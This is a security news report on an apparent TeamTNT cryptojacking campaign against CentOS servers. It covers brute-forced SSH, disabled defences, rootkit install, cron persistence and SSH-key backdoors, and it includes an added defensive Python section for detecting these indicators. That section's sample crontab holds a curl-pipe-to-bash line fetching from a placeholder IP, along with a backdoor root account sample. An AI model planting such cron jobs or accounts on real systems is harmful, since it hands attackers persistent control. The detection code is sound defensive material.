NEWS: New Cryptojacking Campaign Targeting CentOS Servers

September 30, 2024

The notorious cryptojacking group known as TeamTNT has likely re-emerged, launching a new attack campaign aimed at Virtual Private Server (VPS) infrastructures that use CentOS as their operating system.

According to Group-IB researchers, the attackers gained initial access through a brute-force attack on Secure Shell (SSH) credentials associated with the victim’s infrastructure. Once access was obtained, they deployed a malicious script designed to further compromise the system.

The cybersecurity firm from Singapore explained that the script carries out several tasks, such as disabling security mechanisms, deleting logs, halting cryptocurrency mining activities from competing malware, and impeding any potential recovery measures.

The attack process culminates in the installation of the Diamorphine rootkit, which is used to obscure the malicious operations from detection, while simultaneously enabling continued remote access to the compromised system.

This latest wave of activity has been attributed to TeamTNT with moderate confidence, based on similarities between the attack methods and operational techniques observed here and those the group has used in previous incidents.

A History of TeamTNT

TeamTNT was initially identified in 2019, gaining notoriety for its involvement in unauthorized cryptocurrency mining, primarily targeting cloud and container environments. Despite announcing an end to their operations in November 2021 with a “clean quit,” multiple campaigns linked to the group have been reported since September 2022, indicating that the threat actor remains active.

The Malicious Script’s Modus Operandi

The hallmark of this new campaign is a shell script that begins by checking whether the compromised system has already been infected by other cryptojacking malware. It then undermines the device’s security by disabling key protection features such as SELinux, AppArmor, and the system’s firewall.

“The script specifically looks for a daemon linked to Alibaba’s cloud service, identified as aliyun.service,” researchers explained. “If this daemon is found, the script fetches and runs a bash script from update.aegis.aliyun.com to remove the service.”

In addition to killing any competing cryptocurrency mining processes, the script executes a set of commands to remove traces of previous cryptojacking activity. This includes terminating any containerized processes linked to mining and removing container images tied to illicit coin mining operations.

Persistence and Concealment Tactics

The campaign also ensures long-term control of the compromised systems by creating persistence mechanisms. These include configuring cron jobs that repeatedly download and execute the malicious shell script every 30 minutes from a remote server (65.108.48[.]150). The script also modifies the “/root/.ssh/authorized_keys” file, adding a backdoor account to maintain access.

“The attacker further solidifies their control by modifying file attributes, setting up a backdoor user with root privileges, and deleting the command history to conceal their tracks,” the researchers highlighted. “They take extra precautions by making changes to both the SSH and firewall configurations.”

This sophisticated set of tactics illustrates the threat actor’s thoroughness in leaving no trace of their activities, while also maintaining full control over the compromised systems.
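As an added defender-side example that is not part of the original report, the following Python helpers check host configuration for the three persistence indicators described above (a periodic fetch-and-run cron job, an extra UID-0 account, and an SSH key missing from a known-good baseline). The sample crontab, passwd and authorized_keys excerpts, the IP address, key blobs and account name are all constructed for illustration.

```python
import re

# Constructed /etc/crontab excerpt (not from a real host): the last line
# mirrors the 30-minute fetch-and-run job described in the article.
CRON_SAMPLE = """\
# m h dom mon dow user command
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * root curl -s http://198.51.100.7/x.sh | bash
"""

# Constructed /etc/passwd excerpt: 'sysupd' is a second UID-0 account.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sysupd:x:0:0::/root:/bin/bash
"""

# Constructed /root/.ssh/authorized_keys; only the first key is in the baseline.
AUTH_KEYS_SAMPLE = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAdmin admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCExampleKeyUnknown
"""
BASELINE_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAdmin"}

# A download tool whose output is piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def suspicious_cron_entries(crontab_text):
    """Cron lines that download something and pipe it directly into a shell."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.startswith("#")
            and FETCH_AND_RUN.search(line)]

def extra_uid0_accounts(passwd_text):
    """Account names other than root whose UID field is 0 (backdoor root users)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found

def unexpected_authorized_keys(keys_text, baseline):
    """authorized_keys entries whose key blob is not in the known-good baseline."""
    unexpected = []
    for line in keys_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] not in baseline:
            unexpected.append(parts[0] + " " + parts[1][:12] + "...")
    return unexpected
```

On a live host the same functions can be fed the contents of /etc/crontab, the /var/spool/cron files, /etc/passwd and each user's authorized_keys; a hit in any of them is a reason to pull the box for forensics rather than to clean it in place.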

Conclusion

The resurgence of TeamTNT poses a significant threat to cloud infrastructures and VPS environments, particularly those running CentOS. The use of brute force to gain SSH access, followed by the deployment of rootkits and other malicious tactics, makes the group a formidable adversary. This new campaign demonstrates the ongoing risk posed by cryptojacking groups, who continue to evolve their techniques to exploit cloud and container-based systems for unauthorized cryptocurrency mining activities.